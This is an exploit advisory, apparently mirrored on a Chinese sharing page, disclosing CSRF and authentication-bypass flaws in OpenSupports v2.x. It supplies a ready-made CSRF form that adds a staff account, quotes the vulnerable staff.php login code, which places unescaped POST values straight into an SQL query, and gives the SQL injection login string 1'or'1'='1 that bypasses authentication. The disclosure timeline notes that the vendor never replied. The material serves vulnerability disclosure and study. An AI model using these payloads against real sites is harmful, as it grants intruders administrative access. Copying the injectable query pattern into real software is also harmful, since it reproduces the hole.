扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 |
[+] Author: TUNISIAN CYBER [+] Exploit Title: OpenSupports v2.x AuthBypass/CSRF Vulnerabilities [+] Date: 15-03-2014 [+] Category: WebApp [+] Version: 2.x [+] Tested on: KaliLinux/Windows 7 Pro [+] CWE: CWE-302/CWE-89 [+] Vendor: http://www.opensupports.com/ [+] Friendly Sites: na3il.com,th3-creative.com [+] Twitter: @TCYB3R 1.OVERVIEW: OpenSupports v2.x suffers from a CSRF and authentication bypass Vulnerabilities. 2.Version: 2.x 3.Background: http://www.opensupports.com/wiki/index.php?title=Main_Page 4.Proof Of Concept: CSRF:Add Staff Members <html> <form method="POST" name="form0" action="http://localhost/demo/admin/staffadmin.php?id=agregar"> <input type="hidden" name="nombre" value="TCYB3Rx20x"/> <input type="hidden" name="email" value="g4k@hotmail.esxxx"/> <input type='submit' name='Submit4' value="Agregar"> </form> </html> Authentication Bypass: File: staff.php [PHP] if(isset($_POST['user'])){ $user = $_POST['user']; $pass = $_POST['pass']; $userreg=mysql_query("select * from staff WHERE user='$user' AND pass='$pass'") or die ("ERROR 1"); [PHP] Username:1'or'1'='1 Password:1'or'1'='1 5.Solution(s): no contact from vendor 6.TIME-LINE: 2014-13-03: Vulnerability was discovered. 2014-13-03: Contact with vendor. 2014-14-03: No reply. 2014-15-03: No reply. 2014-15-03: Vulnerability Published 7.Greetings: Xmax-tn Xtech-set N43il Sec4ver,E4A Members |
体验盒子
